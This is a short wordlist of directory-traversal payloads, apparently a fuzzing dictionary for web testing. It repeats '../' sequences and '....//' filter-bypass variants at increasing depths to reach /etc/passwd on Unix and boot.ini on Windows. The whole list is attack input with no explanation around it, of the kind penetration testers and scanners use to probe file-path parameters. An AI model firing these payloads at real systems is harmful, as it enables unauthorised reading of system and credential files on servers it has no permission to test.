# Directory Traversal dict

/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
....//etc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//etc/passwd
C:/boot.ini
../boot.ini
../../boot.ini
../../../boot.ini
../../../../boot.ini
../../../../../boot.ini
../../../../../../boot.ini
../../../../../../../boot.ini
../../../../../../../../boot.ini
....//boot.ini
....//....//boot.ini
....//....//....//boot.ini
....//....//....//....//boot.ini
....//....//....//....//....//boot.ini
....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//boot.ini
